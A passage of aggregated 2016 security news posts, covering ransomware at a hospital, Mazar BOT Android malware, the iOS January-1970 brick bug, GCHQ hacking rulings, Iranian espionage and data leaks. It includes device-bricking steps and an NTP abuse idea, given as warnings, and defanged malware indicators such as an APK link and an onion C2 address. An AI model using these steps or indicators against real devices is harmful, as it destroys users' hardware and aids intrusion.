This experiment was being carried out through a 15-centimeter thick wall, reinforced with metal studs, according to the researchers.
"The experiment...was conducted using a Lenovo 3000 N200 laptops, which exhibit a particularly clear signal," the paper reads. "The attacks are completely non-intrusive: we didn't modify the targets or open their chassis."
The security researchers successfully extracted the secret key after observing around 66 decryption processes, each lasting about 0.05 seconds, resulting in a total measurement time* of about 3.3 secs.
Future Challenges:
Future challenges for researchers include the challenges of non-chosen ciphertext attacks and attacking other cryptographic primitives (such as symmetric encryption). Moreover, minimizing the number of decryption operations in order to extract the secret key.
The team will present its work at the upcoming RSA Conference on March 3. To know in-depth explanation with technical details about the attack, we recommend you read the research paper [PDF].
*Note: When the team says the secret key was obtained in 'seconds', it is the total measurement time, and not how long the time would take for the attack to actually be carried out.
Ransomware demanded $3.6M after takes offline the Hollywood Presbyterian Medical Center
16.2.2016 Virus
Cyber criminals demanded $3.6M after a ransomware-based attack takes offline the systems at the Hollywood Presbyterian Medical Center.
In the “2016 Cyber Security Predictions: From Extortion to Nation-state Attacks” I published at the end of 2015 I have predicted the criminal practices of the extortion will reach levels never seen before.
“Cyber criminals will use threaten victims with ransomware and DDoS attack in an attempt to extort money to stop the attacks or to allow victims to rescue the locked files. Ransomware will be used to target IoT devices like SmartTV, wearables and medical devices.” I wrote in a blog post, and the facts are confirming my expectations.
In the last weeks, a new wave of ransomware targeted million users in Europe, but probably the news is more sensational when the victims are public services like hospitals or power facilities. In January, the Israeli Public Utility Authority suffered a serious incident that caused problems with the systems of the institution, now we discuss other disconcerting news, the computers at Hollywood Presbyterian Medical Center have been down for more than a week due to a ransomware infection.
A local computer consultant revealed to the media that the ransom being demanded was about 9,000 BTC, or just over $3.6 million dollars.
Now the situation has been restored and all the machines have been sanitized, while law enforcement is still investigating the case. Computers storing patients’ data, CT scans, Hospital’s documentation, and lab data went offline.
Hollywood Presbyterian Medical Center ransomware
Unfortunately, the staff at Hollywood Presbyterian Medical Center faced the paralysis of internal services due to the cyber attack.
[The Hollywood Presbyterian Medical Center] reported “significant IT issues and declared an internal emergency” Feb. 5, said hospital president and CEO Allen Stefanek.
The NBC Los Angeles reported the case of a patient that had to drive more than an hour to Palmdale to pick up medical tests in person.
Stefanek also added that hospital’s emergency room systems have been sporadically impacted by the ransomware forcing the displacement of some patients to other hospitals.
The Hospital continued to work but any activity relying on IT system was impacted, registrations and medical records were logged on paper.
The experts at the Hollywood Presbyterian Medical Center haven’t provided technical details about the incident, it is not clear which family of malware infected the systems.
Approximate machine improves the Bitcoin mining by 30 percent
16.2.2016 IT
A team of Illinois-based scientists have conducted a research to improve the Bitcoin mining process by 30 percent.
Bitcoin mining is becoming a process even more costly in terms of computational resources, but a team of Illinois-based researchers have conducted a study to speed up this process.
The group of scientists led by Indian Scientist Rakesh Kumar, and including Matthew Vilim and Henry Duwe, has developed a new machine for Bitcoin Mining called “Approximate Hardware.”
The experts will present their study at the Design and Automation Conference in June 2016.
According to the researchers the “Approximate” machine that could improve the Bitcoin mining process by 30 percent.
“We exploit this inherent tolerance to inaccuracy by proposing approximate mining circuits that trade off reliability with area and delay. These circuits can then be operated at Better Than Worst-Case (BTWC) to enable further gains. Our results show that approximation has the potential to increase mining profits by 30%” states a paper published by the researchers.
The Approximate system takes advantage of imperfections in the hardware system, such as False Positives and False negatives. False Positives are observed when errors are not present, but notified as a fake error. False Negatives are observed when we are in the presence of errors, but they are not notified.
The researchers have found a way to take the advantages of these imperfections in the system to make the Bitcoin mining process more efficient.
The Approximation system scans for the errors to improve the Bitcoin mining.
“Bitcoin mining is a particularly good candidate for approximation because its parallelism mitigates error propagation and a built-in verification system detects any false positives,” reads the paper. “Furthermore, we have identified adders as beneficial choices for approximation in hashing cores in a mining ASIC.” continues the paper. “However, not all approximate adders yield increases in profit. Profits are maximized by adders that minimize delay at the expense of area, and approximate adders should be chosen accordingly. Moreover, profits may be improved by operating the hashing cores at Better Than Worst-Case (BTWC) operating points, past their nominal frequencies”
If you want do deep in the research of the scientists, give a look to the paper titled “Approximate Bitcoin Mining,” but let me anticipate that it is not easy to read.
Russia Wants to Kick Foreign Tech Companies Out Of The Nation
15.2.2016 Safety
Someone wants to kick Microsoft, Google and Apple off from his land, but himself uses Gmail and Mac.
The newly appointed Internet Tsar German Klemenko, who is the first internet advisor of Vladimir Putin, wants to kick off American Giants from Russia.
In a 90-minute interview conducted by Bloomberg, Klemenko expressed his interest to vanish the presence of tech biggies of foreign countries from Russia.
Google & Apple have to Pay 18% more VAT
As part of this, Klemenko plans to hike the tax on foreign companies, including Google and Apple, by 18% VAT on their applications & services sold online.
russia-german-klimenko
It is estimated that Apple, Google and other companies are nearly gaining RUB 300 Billion (£2.7 Billion, US$4 Billion) in revenue every year from Russia.
"When you buy an app from Google Play or the App Store anywhere in Europe, VAT is charged at the place of payment, but not here in our banana republic," says Klemenko.
The proposed movement will be backed up by Andrey Logovoi, a parliament lawmaker and former KGB (Russia's Committee for State Security) agent, who have been accused by the UK of assassinating former agent Alexander Litvinenko in London.
Klemenko, as the first Internet advisor, is more focused to expand the Russian Internet Market by promoting the home-brew projects such as Yandex, Mail.ru , VK social network and much more.
Klemenko is making another movement to replace Windows Operating System with Customized Linux for the Government offices. He claimed that 22,000 municipal government are ready to install Linux.
This is the similar situational turn as China had followed earlier by building their customized Operating System named NeoKylin that underline the presence of National Internet Identity across the cyberspace.
Foreign Companies are Threat to National Security
Google track everything, responds to 32,000 requests a year from US agencies but it won’t answer one from Russia, according to Klimenko.
It seems that both the nations are unhappy with the worldwide surveillance programs conducted by the US intelligence agency NSA and its British counterpart GCHQ which indulge into one’s private life.
“We have to consider this as a kind of potential threat to our national security,” he said.
This stringent movement would put an end to the foreign snooping programs which is a major concern for the Millions and also would draw a Green Arrow vertically in the Russian Stock Exchange.
As Russia is getting inspired from China, as they have started to mark their signature in many diversified fields such as:-
The shipment of their own manufactured SmartPhone “Xiaomi” to many countries.
Implementing a Great Firewall.
Weibo, a Social Networking service which had reached beyond 100 million active users.
Baidu Search Engine.
And many more...
Kicking Off: A Feasible Option?
Kicking off foreign technologies from the nation would raise the eyebrows of many, as today's intended world is being linked via wires to achieve the connectivity and maintain a healthy relationships with the foreign counterparts.
“The way it’s done in North Korea or China with its firewall probably doesn’t fit us, but it’s only a matter of time,” Klimenko said. “It won’t be fatal if Google leaves Russia -- Yandex and Mail.ru have similar technologies.”
Keeping Espionage apart, the proposed plan would hinder the future unified developments which could benefit the nation.
If every country would follow the same crooked path, then our Mother Earth would not be different from other lifeless planets as all are being isolated in their boundaries.
Let's see what other demands are cooking up in the mind of Russia's new Internet Tsar!
Warning — Setting This Date On iPhone Or iPad Will Kill Your Device Permanently
15.2.2016 Apple
Don’t Try this at Home!
An interesting software bug has been discovered in Apple's iOS operating system that could kill your iPhone, iPad or iPod Dead Permanently.
Yes, you heard me right.
An issue with the date and time system in iOS had emerged recently when Reddit users started warning people that changing your iPhone's or any iOS device's date to January 1, 1970, will brick your iPhone forever.
Video Demonstration
You can watch the whole process in the video given below. Even regular recovery tricks do not work.
So, you are recommended to Not Try This Trick with your iOS device really – unless you book a trip to your local Apple Store.
While I don’t have any intention or desire to try it out with my iPhone 6s to confirm the authenticity of the bug, it is pretty much clear based on reports that seem legitimate.
YouTuber Zach Straley first discovered the issue, which was later confirmed by iClarified, who tested the trick on an iOS device.
Affected iOS Devices
This bug affects any iOS device that uses 64-bit A7, A8, A8X, A9 and A9X processors and runs iOS 8 or newer, including iPhones, iPads, and iPod touches. However, for those running on 32-bit iOS versions are not affected by this issue.
How the Bug Kills the iPhone?
Basically, the whole process is due to this:
Set up the date to January 1, 1970, via settings on your iOS device, Reboot your device, and you are done.
Your iPhone or iPad will no longer boot and will be stuck to the Apple logo. Even recovery mode restore or DFU mode will not let you restore your device; it will remain stuck on the bootup screen.
Your device will reportedly not come back, and the only way to get it back to work once again is to take your iOS device to an Apple Store.
The Only Way to Get Your iPhone Back
The bug is believed to be related to UNIX timestamp epoch that causes the kernel to crash. The only way to get it back is to open the device's casing and physically disconnect the battery from the logic board. This could only be done with the help of Apple's Genius Bar.
This process will reset the iPhone's date and allow it to boot.
While there isn't any other fix at the moment, Apple is expected to come up with a software update to fix and unbrick the affected iOS devices.
Though some users are saying that letting the battery drain could make the iPhone work once again, or changing the SIM card could fix the issue, or waiting for the device to back after 5 hours, you are still advised to not try this on your device as there is no guarantee these tricks are going to work.
Wanna Mine Bitcoins Faster? Researchers Find New Way to Do it
15.2.2016 IT
Wanna Mine Bitcoins Faster? Researchers Find New Way to Make Bitcoin
A new machine for Bitcoin Mining called "Approximate Hardware" would make Bitcoin mining easier.
Bitcoin had gained tremendous popularity over a few couple of years among the virtual currencies due to its decentralized principle.
Mining a single Bitcoin is not an ice cake walk, as it requires an enormous amount of computing power to dig Bitcoins.
To overcome this issue and mine Bitcoins faster, security researchers has conducted a study and made a new loophole in the mining process in an effort to mine the Bitcoins easily.
How to Mine Bitcoins Faster?
A team of Illinois-based researchers led by Indian Scientist, Rakesh Kumar, has designed a new hardware named "Approximate" that could reduce the pain of Bitcoin mining by 30 percent.
The proposed system would make use of the faults in the hardware system such as:
False Positives where an error is not present but notifies a fake error.
False Negatives where an error is present but does not notify the real error.
Therefore, by taking the advantages of imperfections in the system, the process of Bitcoin mining could get easier than the classical methods used today.
Approximate Bitcoin Mining
Approximation system is one such hardware that scans for the errors to make the mining somehow, simple.
"Bitcoin mining is a particularly good candidate for approximation because its parallelism mitigates error propagation and a built-in verification system detects any false positives," reads the paper. "Furthermore, we have identified adders as beneficial choices for approximation in hashing cores in a mining ASIC."
Dr. Kumar also had expressed that his team's goal is not building a perfect Bitcoin mining hardware, but their research work would inculcate to design much better mining hardware in the near future.
Also Read: Meet The World's First Person Who Hacked His Body to Implant a Bitcoin Payment CHIP
Kumar and his team, including Matthew Vilim and Henry Duwe, will present their work in a talk titled, "Approximate Bitcoin Mining," at the Design and Automation Conference (electronic design) in June 2016.
This Android Malware Can Root Your Device And Erase Everything
15.2.2016 Android
A new Android malware has been making waves recently that have the capability to gain root access on your smartphone and completely erase your phone's storage.
Dubbed Mazar BOT, the serious malware program is loaded with so many hidden capabilities that security researchers are calling it a dangerous malware that can turn your smartphone into a zombie inside hacker's botnet.
Mazar BOT was discovered by Heimdal Security while the researchers at the firm were analyzing an SMS message sent to random mobile numbers and locations.
How Mazar BOT Works
Despite other Android malware that distributes itself by tricking users into installing an app from third-party app stores, Mazar spreads via a spam SMS or MMS messages that carry a link to a malicious APK (Android app file).
Once the user clicks the given link, he/she'll be ending up downloading the APK file on their Android devices, which when run, prompts the user to install a new application.
This new Android app has a generic name, MMS Messaging, that asks for admin level privileges. Most of the users end up giving the root access to the malicious app due to its common name.
What Makes Mazar BOT So Nasty
Once gaining root access on the victim's device, Mazar BOT can do variety of nasty stuff on your Android devices, like:
Gain boot persistence to help survive device restarts
Send and Read your SMS messages
Make Calls to your contacts
Read the phone's state
Plague phone's control keys
Infect your Chrome browser
Change phone settings
Force the phone into sleep mode
Query the network status
Access the Internet
Wipe your device's storage (the most critical capabilities of all)
Mazar BOT Browses Internet Anonymously Using TOR
Besides these tasks, Mazar BOT can also download a legitimate TOR (The Onion Router) Android app on your smartphone and install it too, even without your consent or permission.
Using TOR app, the malware would be able to surf the Internet anonymously via the Tor network.
Once the malware installs TOR on victim's phone, Mazar BOT sends a "Thank you" message to an Iranian phone number (9876543210), along with the device's location.
In some instances, Mazar BOT also installs an Android app called Polipo Proxy that establishes a proxy on the device, allowing the malware's author to spy on victim's Web traffic and carry out Man-in-the-Middle (MitM) attacks.
Who is Behind This Awful Malware?
Mazar BOT is believed to be distributed by a Russia-based group of cyber-criminals.
One clue to this assumption is: Mazar BOT cannot be installed on Android smartphones in Russia, as its source code includes instructions on how to stop the malware installation process on phone configured with the Russian language.
Another clue is: There is an unwritten law in Russia that says "if cyber criminals don't go after Russians, Russian authorities will not go after them." Moreover, there is no such indication yet that this Mazar BOT campaign has affected anyone in Russia.
Until now, Mazar BOT for Android has been advertised for sale on several Russian underground (Dark Web) forums, but this is the first time this creepy code has been abused in active attacks.
How to Protect Yourself from Mazar BOT
There are standard protection measures you need to follow to remain unaffected:
NEVER click on links in SMS or MMS messages sent to your phone.
Go to Settings → Security → Turn OFF "Allow installation of apps from sources other than the Play Store" option.
Always keep an up-to-date Anti-virus app on your Android devices.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.
The IPT ruled that GCHQ spies can legally hack any electronic devices
15.2.2016 BigBrothers
The British Intelligence Agency GCHQ has a license to hack computers and devices, the UK’s Investigatory Powers Tribunal (IPT) ruled.
This means that the UK Government is giving full power to its intelligence agency to spy on Britons as well as people living abroad.
The verdict was issued on Friday after Privacy International and seven ISPs launched a legal challenge against the conduct of the CGHQ whom hacking operations were revealed by documents leaked by NSA whistleblower Edward Snowden.
The CGHQ is responsible of “persistent” illegal hacking of electronic devices and networks worldwide, the Investigatory Powers Tribunal (IPT) has been told.
The popular whistleblower Edward Snowden disclosed a collection of documents revealing the extent of surveillance programmes carried out by the Five Eyes alliance. Snowden revealed the existence of secret surveillance activities such as the Tempora operation and hacking platforms such as the Smurf suite.
GCHQ
GCHQ admitted for the first time that government monitoring station in Cheltenham carries out “persistent” and “non-persistent” Computer Network Exploitation (CNE) against targets in the UK and abroad.
In 2013, the tribunal was told, 20% of GCHQ’s intelligence reports contained information that was obtained through hacking operations.
The case has been brought in hearing at the IPT which deals with complaints against the surveillance operated by the UK intelligence. A four-day hearing is at the Rolls Building in central London.
“The [legal] regime governing CNE … remains disproportionate,” Ben Jaffey, counsel for Privacy International, told the tribunal. “Given the high potential level of intrusiveness, including over large numbers of innocent persons, there are inadequate safeguards and limitations.”
Jaffey highlighted that GCHQ’s hacking alter the targeted systems, an activity that is not considered legal by the authorities.
“The use of computer network exploitation by GCHQ, now avowed, has obviously raised a number of serious questions, which we have done our best to resolve in this Judgment,” reads the lengthy ruling from the Investigatory Powers Tribunal (IPT).
“Plainly it again emphasises the requirement for a balance to be drawn between the urgent need of the Intelligence Agencies to safeguard the public and the protection of an individual’s privacy and/or freedom of expression.”
The court has investigated the legality of the methods used by British intelligence
The tribunal investigated “investigates and determines complaints of unlawful use of covert techniques by public authorities infringing our right to privacy.”
In some cases, the GCHQ installed malware on targeted systems and hacked mobile devices with its Smurf suite.
In November 2015, for the first time the technological abilities of the UK’s National Crime Agency (NCA) have been revealed in a collection of documents, the British law enforcement agency has “equipment Interference” (EI) capabilities, which allow it to hack into mobile devices and computers.
Eric King, the deputy director of the Privacy International, who analyzed the document noticed that in a section there is the explicit reference to the capability of the UK law enforcement having the capability to conduct “equipment interference.”
“Equipment interference is currently used by law enforcement agencies and the security and intelligence agencies,” states the section. The documents also reveal that “more sensitive and intrusive techniques” are available to a “small number of law enforcement agencies, including the National Crime Agency.”
UK law enforcement already in hacking business according to IPBill. pic.twitter.com/SAGzw2w4Fh
— Eric King (@e3i5) 4 Novembre 2015
The GCHQ hacking operations were conducted under a self-imposed code of conduct, the IPT recognizes as legal these activities despite the chagrin of privacy advocates.
“We are disappointed that the IPT has not upheld our complaint and we will be challenging its findings,” said Scarlet Kim, legal officer at Privacy International.
I wonder at this point what will be the repercussions of such a decision on the international level. This decision authorizes in fact any government to hack systems of foreign states. We are in the far west.
Don’t set your iPhone’s Date to January 1, 1970 or your will brick it
15.2.2016 Apple
Another embarrassing problem for Apple iOS mobile devices (iPhone and iPad), setting the date of the devices to January 1st, 1970 will brick them. Don’t Try it!
Another embarrassing problem for Apple iOS mobile devices, a software flaw could be exploited to permanently kill your iPhone, iPad or iPod. The issue affects the Apple iOS date and time system and could be triggered by setting the date to January 1, 1970. The news appeared recently in Reddit discussions warning users about a flaw that could brick iPhone forever, and the presence of the flaw has been confirmed by iClarified.
“Setting the date of your iPhone to January 1st, 1970 will brick your device, according to users across the web and confirmed by iClarified. The bug will affect any 64-bit iOS device that is powered by the A7, A8, A8X, A9, and A9X. 32-bit iOS devices are reportedly not affected by this issue.” reported iClarified.
iPhone 6
Meanwhile on Reddit the users warned other Apple users sharing the following message:“When the date of a 64-bit iOS device is set to January 1, 1970, the device will fail to boot. Connecting the device to iTunes and restoring the device to factory defaults will not put the device back in working order. Instead, a physical repair is required. When connected to public Wi-Fi, iPhone calibrates its time settings with an NTP server. Theoretically, attackers can send malicious NTP requests to adjust every iPhone’s time settings to January 1, 1970, hence brick every iPhone connected to the same network.According to /u/sarrius, worldwide Apple Store are being made aware that disconnecting the battery and reconnecting fixes the issue. It should be common knowledge to all stores worldwide by tomorrow.”
Be careful and do not try to trigger the flaw with your iOS device, the YouTuber Zach Straley first published a Video PoC of the issue.
As explained in the video, after set up the date to January 1, 1970, trying to reboot the device users will notice that the iPhone or iPad will no longer boot and will be frozen displaying the Apple logo.
“Since a DFU or recovery mode restore will not unbrick your device, we strongly recommend that you do not try to test this bug. Users report that while a restore may succeed, the device will still fail to boot after the restore.” continues iClarified.
Let’s wait for a software fix from Apple.
Mazar Bot actively targeting Android devices and wiping them
15.2.2016 BotNet
A new malware dubbed Mazar Bot is threatening Android users and has the ability to gain root access to the mobile device and completely wipe it.
A new threat is threatening Android users, its name is Mazar BOT and has the ability to gain root access to the mobile device and completely wipe its storage.
Mazar BOT could be used by threat actors to recruit victims’ Android devices in a mobile botnet.
The experts at Heimdal Security spotted the Mazar BOT in live attacks while they were investigating an SMS message sent to random mobile numbers and locations. Mazar BOT spreads via a spam SMS or MMS that arrives with the following link (sanitized by Heimdal Security) to a malicious APK:
You have received a multimedia message from +[country code] [sender number] Follow the link http: //www.mmsforyou [.] Net / mms.apk to view the message.”
Once the victim clicks the link above, he will download the APK file on their Android devices. When the file is executed it prompts the user to install a new application with a generic name, MMS Messaging, that asks for admin level privileges … and most of the users give them to the app.
The admin privileges allow the threat actors to perform the following operations:
Gain boot persistence to help survive device restarts
Send and Read your SMS messages
Make Calls to your contacts
Read the phone’s state
Plague phone’s control keys
Infect your Chrome browser
Change phone settings
Force the phone into sleep mode
Query the network status
Access the Internet
Wipe your device’s storage (the most critical capabilities of all)
The researchers at Heimdal Security observed that Mazar BOT is also able to download and install a legitimate TOR Android app on the infected device, even without the user’s interaction.
“In the next phase of the attack, the infection will unpack and run the TOR application, which will then be used to connect to the following server: http: // pc35hiptpcwqezgs [.] Onion.
After that, an automated SMS will be sent to the number 9876543210 (+98 is the country code for Iran) with the text message: “Thank you”. The catch is that this SMS also includes the device’s location data.” continues the post.
The mobile malware can use the Tor app to surf the Internet anonymously. The experts also noticed that Mazar BOT also installs an Android app called Polipo Proxy which acts as a local proxy for the user’s traffic. The Polipo Proxy could be used by attackers malware’s author to spy on victim’s Web traffic and carry out Man-in-the-Middle (MitM) attacks.
The experts believe that the Mazar BOT is operated by a Russian cyber criminal gang, it is curious that the malware cannot be installed on Android smartphones in Russia. The analysis of the source code of the malware revealed the presence of instructions on how to stop the malware installation process on phone configured with the Russian language.
Another clue that suggests the involvement of Russian bad actors is that the Mazar BOT is offered for sale on several Russian underground forums.
In order to protect mobile devices from this threat follow these simple suggestions:
Don’t click on links in SMS or MMS messages sent to your phone.
Go to Settings → Security → Disable the option “Allow installation of apps from sources other than the Play Store.”
Install and keep an up-to-date Anti-virus solution on your Android device.
Avoid unsecured Wi-Fi hotspots and keep your Wi-Fi turned OFF when not in use.
Iranian hackers compromised former IDF chief’s computer
15.2.2016 Hacking
According to Israel’s Channel 10 Iranian hackers succeeded in gaining access last year to the computer database of a retired Israeli army chief of staff.
Many reports published by security firms warn of the increasing threat represented by Iranian hackers. US and Israeli organizations represent a privileged target for these hackers, last year they used stolen private pictures of IDF’s women soldiers to breach Israeli military server.
According to a report published by the Israel’s Channel 10, hundreds of Israel’s current and former top security officials have been targeted by Iranian hackers.
The report reveals that Iranian hackers compromised computers of 1800 key figures worldwide, most of them from Israel including a former Israeli Army chief-of-staff.
The report speculated the involvement of the hackers belonging to the Iran’s Revolutionary Guards. Experts at the Israeli security firm Check Point Software Technologies promptly identified and blocked the attacks.
The Israeli experts also identified one of the Iranian hackers, Yasser Balachi, that accidentally displayed his email ID. Check Point’s head of security services Ron Davidson, confirmed that the man is a member of an organized group.
“Balachi said that he had not operated on his own initiative but for another cyber organization that commissioned the work,” said Ron Davidson.
Yet it is unclear even now what was the actual extent of the damage and what kind of information did they steal.
It is not clear which is the impact of the attack and which information was exposed.
Iranian hackers are becoming even more aggressive, in November computers at the US State Department and other government employees were targeted by them. The experts linked the attackers with the Iranian Revolutionary Guard, according to investigators the Facebook and e-mail accounts of US State Department officials focused on Iran were compromised to gather data about US-Iranian dual citizens in Iran and about the arrest of an Iranian-American businessman in Tehran in October.
The hackers have taken over social media accounts of junior State Department staff to launch a spear phishing campaign on the employees working in the State Department’s Office of Iranian Affairs and Bureau of Near Eastern Affairs and in the computers of some journalists.
Check Point experts confirmed that the Iranian hackers launched spear phishing attacks against their targets with the intent to infect them with spyware.
In December, a report published by Symantec revealed that Iranian hackers have been using malware to track individuals, including Iranian activists and dissidents.
The researchers identified two groups of Iran-based hackers, dubbed Cadelle and Chafer, which were distributing data stealer malware since at least mid-2014. The experts uncovered the command-and-control servers explaining that registration details indicate the Iranian hackers may have been operating since 2011.
There are a number of indicators that suggest both groups are based in Iran, the Cadelle and Chafer teams are most active during the day time within Iran’s time zone and primarily operate during Iran’s business week (Saturday through Thursday).
In June, experts at Clear Sky spotted a number of cyber-attacks launched from the Iran and targeting Israeli organizations and other entities in the Middle East.
Security experts at ClearSky uncovered a cyber espionage campaign dubbed Thamar Reservoir due to the name of its target Thamar E. Gindin. The investigation led the experts to date the Thamar Reservoir campaign back to 2011, threat actors adopted several attack techniques finalized to the espionage.
The majority of the victims of the Thamar Reservoir campaign was located in the Middle East (550) and belong to Middle East and Iranian diplomacy entities, defense and security industries, journalists and human rights organizations.
Who is behind the Thamar Reservoir campaign?
According to the researchers at ClearSky, the evidence collected suggest the involvement of Iranian hackers. The experts noticed several similarities with other attacks in the same geographic area such as:
Attacks conducted using the Gholee malware, which we discovered.
Attacks reported by Trend Micro in Operation Woolen-Goldfish.
Attacks conducted by the Ajax Security Team as documented by FireEye.
Attacks seen during Newscaster as documented by iSight.
No doubts, Iranian hackers will continue to launch cyber espionage campaigns likely with most advanced malware.
Man charged of Laundering $19.6 Million earned with PBX system hacking
15.2.2016 Hacking
Pakistani citizen Muhammad Sohail Qasmani admits laundering Millions from massive computer hacking and telecommunications fraud scheme.
A Pakistani citizen, Muhammad Sohail Qasmani (47) admitted laundering millions of dollars as part of a massive international computer hacking and telecommunications fraud scheme.
The man worked for a hacking crew that targeted US companies by hacking into their PBX systems.
The organization composed by hackers in Bangkok and Pakhistan targeted American firms identifying live phone extensions that weren’t assigned to a user, the operation was allegedly run by Noor Aziz, 53, from Karachi.
The hackers used these extensions to dial premium-rate phone lines they managed, the gang had reaped more than $50m from its victims.
Muhammad Sohail Qasmani laundered US$19.6M and transmitted money to roughly 650 individuals over four years, the prosecutors sustain that the fraud scheme was a highly professional and well organized.
The man set up 650 bank accounts in ten different countries, the accounts were used to collect the money coming from fraudulent phone lines. The man then forwarded the funds to the other hackers, keeping his commission.
Qasmani was arrested by the FBI on December 22, 2014, when he entered in the US, if convicted, the man risks a maximum sentence of 20 years in jail and a $250,000 fine.
“Thanks to the hard work of the prosecutors and agents on this case, Qasmani acknowledged his role in an international scheme that hijacked the telephone networks of US companies and ran up millions in bogus charges,” said the US Attorney Paul Fishman.
“Today, he admitted moving over $19 million in illicit proceeds across 10 countries and ensuring the dialers and hackers who perpetuated the scheme received their cut.” “The successful investigation of Qasmani is a testament to the dedication, hard work, and commitment of the men and women of the FBI, the Enforcement and Removal Operations of the U.S. Customs and Border Protection, and the State Department,”
While Qasmani will be sentenced in May, Aziz is still at large but present in the FBI’s Most Wanted list.
A flaw in CISCO Universal Small Cell allows firmware retrieval
15.2.2016 Vulnerebility
A flaw affecting the Cisco Universal Small Cell devices allows unauthenticated remote users to retrieve devices’ firmware, so Cisco urges patching these systems.
Other problems for the IT giant Cisco, the company is asking service providers using its Universal Small Cell solutions to update their systems and install a patch to solve a serious security issue.
The Cisco Universal Small Cell family is designed to help operators to integrate 3G and 4G small cell services into the IT infrastructure. The presence of the security issue could allow an unauthenticated remote attacker to access devices’ firmware and make a copy.
“A vulnerability in Cisco Universal Small Cell devices could allow an unauthenticated, remote attacker to retrieve firmware from a Cisco-hosted binary server.” states the Cisco’s advisory.
The advisory highlights a problem in the binary server that wasn’t properly enforcing the two-way certificate validation process, this means that the firmware retrieval process is not restricted to Universal Small Cell devices.
As a consequence, if an attacker is able to retrieve a valid key from a Universal Small Cell device he is able to decrypt the binary images and access information it contains, including the service provider configuration hints file that usually contains reserved information.
Of course, this information could be used by a threat actor to attack the Universal Small Cell devices of a specific service provider.
“The vulnerability is due to insufficient enforcement of the two-way certificate validation process by the Cisco-hosted binary server to ensure that only Cisco Universal Small Cell devices are able to download the firmware images and service provider configuration hints file. ” continues the advisory.”The hints file contains IP addresses of the device’s provisioned service provider Cisco Universal Small Cell RAN Management System. The binary images retrieved from the image distribution service could be decrypted by an attacker who has previously retrieved a valid key from the flash of a Cisco Universal Small Cell device.”
If your organization is using a Cisco Universal Small Cell solution you need to apply the patch asap.
Recently another flaw in Cisco ASA Software alerted the security industry, its exploitation could allow an unauthenticated, remote attacker to cause a reload of the affected system or to remotely execute code.
Misconfigured MongoDB allowed manipulation of a Microsoft’s career portal
15.2.2016 Safety
A security expert discovered a misconfigured MongoDB installation behind a Microsoft’s career portal that exposed visitors to attacks.
The security expert Chris Vickery has discovered a new misconfigured MongoDB installation used by a Microsoft’s career portal. The misconfigured MongoDB installation exposed some information and enabled read/write access to the website.
The database also included information on other companies. The database, which is maintained by Punchkick Interactive, a mobile development company hired by Microsoft to manage the m.careersatmicrosoft.com, was promptly secured.
“Microsoft relies on Punchkick to handle the database that powers m.careersatmicrosoft.com. The bad news is that, for at least the past few weeks, this backend database has been exposed to the open internet and required no authentication at all to access.” Vickery wrote in a post published on the MacKeeper blog.
Vickery reported the issue to Microsoft on February 5, as proof of its severity he included a screenshot showing the name, email address, password hash, and issued tokens for Microsoft’s Global Employment Brand Marketing Manager, Karrie Shepro. Punchkick fixed the issue in just an hour.
“The good news is that as of February 5th, following my disclosure of the vulnerability to Punchkick and Microsoft, everything has been secured.”
The misconfigured database could be exploited by hackers to inject malicious code in the web pages used for the job listings and run watering hole attacks.
“The ability to craft arbitrary HTML into an official Microsoft careers webpage is, to say the least, a powerful find for a would-be malicious hacker. This situation is the classic definition of a potential watering hole attack.” Vickery added.
An attacker can use malicious exploit kits to compromise vulnerable visitors’ machines or run a phishing campaign against people searching for a job opportunity at Microsoft.
“In that scenario, any number of browser exploits could be launched against unsuspecting job-seekers. It would also be a fantastic phishing opportunity, as people seeking jobs at Microsoft probably tend to have higher value credentials,” Vickery added.
This incident demonstrates once again the importance of a proper security posture and the efficiency of the patch management process implemented by a company, even when dealing with third-party services.
Stolen card data of 100,000 Britons for sale on the clear web
15.2.2016 Incindent
A website on the clear web is offering for sale stolen card data from more than a million people worldwide including more than 100,000 Britons.
According to a report published by The Times, the website Bestvalid.cc is offering for sale stolen credit and debit card details of 100,000 Britons.
Banking details stolen from more than a million people worldwide goes for £1.67, the list of victims includes former senior adviser to the Queen, bankers, doctors and lawyers.
The site is available on the surface web since at least June and journalists are surprised that law enforcement hasn’t yes seized it.
“The National Crime Agency must act immediately to get this site closed. I will be writing to the NCA to bring this issue to their attention,” said Keith Vaz, chairman of the home affairs select committee.
Politicians are urging the intervention of the police, black marketplaces could be used by the organized crime and radical groups to fund terrorism and other illegal activities.
Aligned with the offer in many black markets hosted on dark web, Bestvalid.cc appears like an ordinary e-commerce, it includes a customer service and refund services for faulty products.
Users can buy stolen payment card data, often completed with further information (i.e. common answer to online banking security questions, postal address of the card holder) that could be used for more sophisticated scams.
A journalist at the Times paid for a lot of data including information from one person he is in contact. He paid in Bitcoin of course and received a package including debit card number, security code, expiry date, mobile phone number and postal address.
When the journalist presented the data to the victim, Laia Humbert-Vidan, 30, a radiotherapy physicist from London, said was disconcerted.
“I don’t feel like the police are able to protect anyone from online fraud. If they were, these types of sites would not exist in the first place.” said Laia Humbert-Vidan.
In the last months the underground market was flooded of data from major data breaches, including the TalkTalk and Carphone Warehouse,
Bestvalid is not hidden in the dark web, it is easy to access and it is one of the biggest websites offering stolen card data.
The cybercrime has a significant economic impact on the economy of every Government, it costs the UK £27 billion a year, and the Centre for Economics and Business Research estimated the same cost at £34 billion a year for businesses alone.
Police Arrest 16-year-old Boy Who Hacked CIA Director
13.2.2016 Crime
The teenage hacker, who calls himself a member of hacktivist group "Cracka with Attitude," behind the series of hacks on the United States government and its high-level officials, including CIA director, might have finally got arrested.
In a joint effort, the Federal Bureau of Investigation (FBI) and British police reportedly have arrested a 16-year-old British teenager who they believe had allegedly:
Leaked the personal details of tens of thousands of FBI agents and US Department of Homeland Security (DHS) employees.
Hacked into the AOL emails of CIA director John Brennan.
Hacked into the personal email and phone accounts of the US spy chief James Clapper.
Broke into the AOL emails of the FBI Deputy Director Mark Giuliano.
Federal officials haven't yet released the identity of the arrested teenager, but the boy is suspected of being the lead hacker of Cracka With Attitude, who calls himself Cracka, the South East Regional Organised Crime Unit (SEROCU) told the Daily Dot.
According to the report, Cracka is the same teenage hacker who recently leaked the personal information of 31,000 government agents belonging to nearly 20,000 FBI agents, 9,000 Department of Homeland Security (DHS) officers and some number of DoJ staffers.
Crime Unite Released a Statement
In a statement, the SEROCU confirmed that the unit had arrested a teenager on Tuesday in the East Midlands on suspicion of:
Conspiracy to commit unauthorised access to computer material contrary to Section 1 Computer Misuse Act 1990.
